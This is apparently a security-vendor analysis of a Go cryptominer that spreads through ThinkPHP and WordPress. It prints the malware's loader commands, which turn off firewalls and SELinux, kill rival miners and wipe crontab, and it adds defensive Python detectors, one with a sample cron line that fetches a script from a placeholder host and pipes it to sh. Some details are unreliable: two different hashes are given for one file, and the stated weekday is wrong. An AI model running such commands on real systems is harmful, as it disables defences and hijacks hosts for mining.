Akamai Security Intelligence & Threat Research

Another Golang Crypto Miner On The Loose

There are many crypto mining malware variants infecting systems on the internet. On Friday, March 4, 2021, I noticed an interesting hit in my honeypot logs. The binary it captured stood out because it was rather large at 4MB, which immediately suggested a crypto miner written in the Go language. I was correct. This one, however, uses some newer exploits to proliferate.

The malware attempted to exploit the ThinkPHP vulnerability in order to download and execute a script named ldr.sh. The loader script downloads the sysrvv binary and kills off other crypto miners. It also adds a crontab entry that reinfects the system every 30 minutes, using wget, curl, or a PHP script rather than relying on a single download method that would fail if that utility is not installed.

The sysrvv binary is UPX packed, meaning it was compressed with the Ultimate Packer for Executables (UPX) but remains directly executable. These are the stats after unpacking:

$ file sysrvv
sysrvv: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

$ sha256sum sysrvv
47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8  sysrvv

$ sha256sum sysrvv
d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16  sysrvv

The malware has recently been uploaded to VirusTotal.

We can extract details of the crypto mining pool with the strings command, a command-line tool that prints the readable strings found in a binary. The pool and wallet address help track other malware contributing to the same mining pool, which is therefore likely run by the same actor. The configuration also shows that they are mining Monero coins:

"pools": [
    {
        "algo": "rx/0",
        "coin": null,
        "url": "xmr-eu1.nanopool.org:14444",
        "user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s",
        "pass": "x",
        "rig-id": null,
        "nicehash": false,
        "keepalive": true,
        "enabled": true,
        "tls": false,
        "tls-fingerprint": null,
        "daemon": false,
        "socks5": null,
        "self-select": null
    },
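The hashing, packer check and strings extraction described above can be joined into one triage step. The following Python is an added example written for this post; it is not Akamai's tooling or the malware's code. It hashes a buffer and compares it against the two sha256 values quoted above, checks for the ELF magic and the UPX tag that packed files carry, and pulls the XMRig-style pool URL, wallet and algorithm out of the printable strings. The SAMPLE buffer is a constructed stand-in built from the configuration fragment shown above, not the real sysrvv bytes.

```python
"""Triage helper for a captured ELF sample.

Added example for this post, not Akamai's tooling or the malware's code.  It
reproduces the steps the post performs by hand (hash the file, check for UPX
packing, pull the XMRig-style pool configuration out of the readable strings)
and joins them into one report.  SAMPLE below is a constructed stand-in for a
binary; it is not the real sysrvv bytes.
"""
import hashlib
import re

# sha256 values quoted in the post for the sysrvv sample
KNOWN_HASHES = {
    "47183b14ed24978643de4697abe917847831b1560256ddd76e44e918a6181fd8",
    "d3196b0b4767e86bf7e9e47722a5f733129c16f81f0ccbe5f822bdcfd778ca16",
}

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"  # tag UPX leaves in the packed file; absent after unpacking


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def is_elf(data: bytes) -> bool:
    return data[:4] == ELF_MAGIC


def looks_upx_packed(data: bytes) -> bool:
    """Cheap packer check: the UPX tag is present in packed files."""
    return UPX_MARKER in data


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Minimal equivalent of `strings -n <min_len>` for printable ASCII runs."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_pool_config(data: bytes):
    """Recover pool URL, wallet and algorithm from an embedded XMRig-style
    JSON fragment.  Returns None when no "url" field is present."""
    def field(name: str):
        m = re.search(rb'"%s":\s*"([^"]*)"' % name.encode(), data)
        return m.group(1).decode("ascii", "replace") if m else None

    url = field("url")
    if url is None:
        return None
    return {"url": url, "user": field("user"), "algo": field("algo")}


def triage(data: bytes) -> dict:
    """One report per sample: hash match against the post's IoCs, ELF/UPX
    checks, and the mining pool the binary is configured for."""
    digest = sha256_hex(data)
    return {
        "sha256": digest,
        "known_sample": digest in KNOWN_HASHES,
        "is_elf": is_elf(data),
        "upx_packed": looks_upx_packed(data),
        "pool": find_pool_config(data),
    }


# Constructed stand-in: ELF magic, padding, a UPX tag and the configuration
# fragment quoted in the post.  A real file would be read with open(path, "rb").
POOL_FRAGMENT = (
    b'"pools": [ { "algo": "rx/0", "coin": null, '
    b'"url": "xmr-eu1.nanopool.org:14444", '
    b'"user": "49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa%s", '
    b'"pass": "x" } ]'
)
SAMPLE = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 32 + UPX_MARKER + b"\x00" * 8 + POOL_FRAGMENT

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run against a real capture, `known_sample` answers the "is this the same file?" question without opening it, and the pool URL and wallet are the values worth pivoting on across other captures, since a wallet is far harder for the operator to change than a download host.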

The malware kills off competing crypto miners by removing their persistence, and it loosens security controls by disabling SELinux and iptables on the victim host. It also removes any other existing miners, including ones hiding as Docker images:

if [ $(id -u) == 0 ]; then
chattr -i /etc/ld.so.preload
ufw disable
iptables -F
service iptables stop
sysctl kernel.nmi_watchdog=0
echo 0 >/proc/sys/kernel/nmi_watchdog
echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf
setenforce 0
echo SELINUX=disabled > /etc/selinux/config
sysctl -w vm.nr_hugepages=$(nproc --all)
chattr -R -ia /var/spool/cron
chattr -ia /etc/crontab
chattr -R -ia /var/spool/cron/crontabs
chattr -R -ia /etc/cron.d
chattr -iua /tmp/
chattr -iua /var/tmp/
killall log_rot
ps aux | grep -v grep | egrep '2t3ik|qW3xT.2|ddg|./oka|postgres: .. . .
/etc/ld.so.preload /etc/rc.d/init.d/kthrotlds /tmp/kthrotlds /usr/sbin/watchdogs /dev/shm/z3.sh /dev/shm/z2.sh /dev/shm/.scr /dev/shm/.kerberods /usr/bin/config.json /usr/bin/exin /usr/local/lib/libioset.so /etc/cron.d/tomcat /etc/rc.d/init.d/watchdogs
docker ps | egrep 'pocosow|gakeaws|azulu|auto|xmr|mine|monero|slowhttp|bash.shell|entrypoint.sh|/var/sbin/bash' | awk '{print $1}' | xargs -I % docker kill %
docker images -a | grep 'pocosow|gakeaws|buster-slim|hello-|azulu|registry|xmr|auto|mine|monero|slowhttp' | awk '{print $3}' | xargs -I % docker rmi -f %
netstat -anp | egrep ':143|:2222|:3333|:3389|:4444|:5555|:6666|:6665|:6667|:7777|:8444|:3347|:14433' | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 %
crontab -r
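The loader above is a useful source of detection logic: no single command in it is unusual on its own, but the combination (SELinux off, firewall flushed, immutable bits cleared, cron wiped, Docker images purged) is. The Python below is an added example written for this post, not Akamai's or the malware's code. It scans a shell script line by line against a small rule set derived from the commands quoted above and reports a script as loader-like when several distinct categories trip. SAMPLE_SCRIPT is constructed from those quoted commands plus one made-up cron line with a placeholder host, standing in for the 30-minute re-infection entry described earlier.

```python
"""Static scan of a shell loader for the defense-evasion steps the post shows.

Added example, not Akamai's or the malware's code.  Each rule is a regex over
one line of script; a script that trips several distinct rules is flagged as
loader-like.  SAMPLE_SCRIPT is constructed from the commands quoted in the
post plus one made-up cron line (placeholder host) standing in for the
30-minute re-infection entry the post describes.
"""
import re

RULES = [
    ("selinux_disabled", re.compile(r"\bsetenforce\s+0\b|SELINUX=disabled")),
    ("firewall_disabled", re.compile(r"\bufw\s+disable\b|\biptables\s+-F\b|\bservice\s+iptables\s+stop\b")),
    ("immutable_bit_cleared", re.compile(r"\bchattr\s+(?:-R\s+)?-[iua]+\b")),
    ("ld_preload_tamper", re.compile(r"/etc/ld\.so\.preload")),
    ("watchdog_disabled", re.compile(r"nmi_watchdog")),
    ("hugepages_for_miner", re.compile(r"vm\.nr_hugepages")),
    ("cron_wiped", re.compile(r"\bcrontab\s+-r\b")),
    ("docker_purge", re.compile(r"\bdocker\s+(?:kill|rmi)\b")),
    ("mass_kill", re.compile(r"xargs\s+-I\s*%\s*kill\s+-9")),
    ("fetch_and_execute", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),
]


def scan_script(text: str) -> list:
    """Return one finding per flagged line: {'line_no', 'line', 'tags'}."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        tags = [name for name, rx in RULES if rx.search(line)]
        if tags:
            findings.append({"line_no": no, "line": line.strip(), "tags": tags})
    return findings


def distinct_tags(findings) -> set:
    return {t for f in findings for t in f["tags"]}


def is_loader_like(findings, min_categories: int = 3) -> bool:
    """Several independent evasion categories in one script is the signal;
    a lone `iptables -F` in an admin script is not."""
    return len(distinct_tags(findings)) >= min_categories


# Constructed sample: commands quoted in the post plus a made-up cron line.
SAMPLE_SCRIPT = r"""
if [ $(id -u) == 0 ]; then
chattr -i /etc/ld.so.preload
ufw disable
iptables -F
service iptables stop
sysctl kernel.nmi_watchdog=0
setenforce 0
echo SELINUX=disabled > /etc/selinux/config
sysctl -w vm.nr_hugepages=$(nproc --all)
chattr -R -ia /var/spool/cron
docker ps | egrep 'xmr|mine|monero' | awk '{print $1}' | xargs -I % docker kill %
crontab -r
*/30 * * * * (curl -fsSL http://PLACEHOLDER-HOST/ldr.sh || wget -q -O - http://PLACEHOLDER-HOST/ldr.sh) | sh
echo "routine maintenance finished"
"""

if __name__ == "__main__":
    hits = scan_script(SAMPLE_SCRIPT)
    for h in hits:
        print(f"{h['line_no']:>3}  {', '.join(h['tags']):<40} {h['line']}")
    print("loader-like:", is_loader_like(hits))
```

The same rule set applies equally well to a crontab dump or to shell history pulled from a suspect host; the `min_categories` threshold is what keeps a legitimate hardening or firewall-reset script from being flagged on a single match.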

Redress is a tool for analyzing stripped Go binaries. Its output gives us a catalog of the vulnerabilities this malware uses to spread.

Table of Exploits

The following functions are also used to attempt brute-force logins based on a list of credentials stored in the malware binary. If access is gained, the malware attempts to upload a plugin or edit a theme.

wordpress.(*wpExec).login
wordpress.(*wpExec).exploitUploadPlugin    Function to brute force login
wordpress.(*wpExec).exploitWritableTheme
wordpress.BruteXmlrpc
wordpress.pwdByUsr

A sample of the strings from this function in the binary shows a list of credentials and a curl command with the User-Agent set to curl_brute_wordpress.

What is interesting is that the malware appears to set the User-Agent request header to the name of the exploit it is attempting. Searching web server logs for these user-agent strings is a good way to determine whether your system has been attacked or compromised by this particular piece of malware.
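Turning that user-agent tell into a log check is straightforward. The Python below is an added example written for this post, not Akamai tooling. It parses combined-format access log lines and flags the user-agent quoted above (curl_brute_wordpress); any user-agent of the same curl_<name> shape, which is an assumption generalised from the remark that the agent is set to the exploit name; and bursts of POSTs to xmlrpc.php from a single client, consistent with the wordpress.BruteXmlrpc function listed above. SAMPLE_LOG is constructed for the demo using documentation IP ranges, and curl_thinkphp is a made-up agent string, not one observed in the sample.

```python
"""Access-log sweep for the user-agent tell described in the post.

Added example, not Akamai tooling.  It flags the user-agent string the post
quotes (curl_brute_wordpress); any user-agent of the same "curl_<name>" shape,
an assumption generalised from the post's remark that the agent is set to the
exploit name; and bursts of POSTs to xmlrpc.php from one client, consistent
with the wordpress.BruteXmlrpc function the post lists.  SAMPLE_LOG holds
constructed lines in combined log format with documentation IP ranges;
"curl_thinkphp" is a made-up agent for the demo.
"""
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

KNOWN_UAS = {"curl_brute_wordpress"}                     # quoted in the post
CURL_PREFIX_UA = re.compile(r"^curl_[a-z0-9_]+$", re.I)  # assumed generalisation


def parse_line(line: str):
    """Combined log format -> dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_ua(ua: str):
    if ua in KNOWN_UAS:
        return "known_ua"
    if CURL_PREFIX_UA.match(ua):
        return "curl_prefix_ua"
    return None


def analyze(lines, xmlrpc_threshold: int = 5) -> dict:
    """Collect user-agent hits and per-client xmlrpc.php POST counts."""
    ua_hits = []
    xmlrpc_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:  # skip lines that are not in combined format
            continue
        tag = classify_ua(rec["ua"])
        if tag:
            ua_hits.append({"ip": rec["ip"], "path": rec["path"], "ua": rec["ua"], "tag": tag})
        if rec["method"] == "POST" and rec["path"].split("?", 1)[0].endswith("/xmlrpc.php"):
            xmlrpc_posts[rec["ip"]] += 1
    return {
        "ua_hits": ua_hits,
        "xmlrpc_bruteforce": {ip: n for ip, n in xmlrpc_posts.items() if n >= xmlrpc_threshold},
    }


# Constructed sample log (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Mar/2021:10:00:%02d +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "curl_brute_wordpress"' % i
    for i in range(6)
] + [
    '198.51.100.23 - - [04/Mar/2021:10:00:09 +0000] "GET /wp-login.php HTTP/1.1" 200 5342 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.23 - - [04/Mar/2021:10:00:10 +0000] "GET / HTTP/1.1" 200 1024 "-" "curl_thinkphp"',
    '192.0.2.5 - - [04/Mar/2021:10:00:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 412 "-" "WordPress/5.6; https://blog.example"',
    "this is not a log line",
]

if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for h in report["ua_hits"]:
        print(f"{h['ip']:<15} {h['tag']:<15} {h['ua']}  {h['path']}")
    print("xmlrpc brute-force candidates:", report["xmlrpc_bruteforce"])
```

The single legitimate pingback POST from 192.0.2.5 stays below the threshold, which is the point of counting per client rather than alerting on every xmlrpc.php request; a matching user-agent, by contrast, is worth a look even on a single request.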

There also appear to be functions that brute-force JupyterLab Notebook credentials, I suspect in an attempt to run arbitrary commands on poorly secured notebooks.

Conclusion

Crypto mining software will continue to evolve and take advantage of the latest software vulnerabilities. Vulnerability classes like command injection and remote code execution will remain valuable to cyber criminals as a way to monetize your CPU cycles. What we do know for sure is that criminals are updating their malware to use the latest exploits, which may mean older vulnerabilities are either being patched or becoming a less reliable way to compromise systems. Again, the best course of action is keeping system software updated and using strong passwords with multi-factor authentication.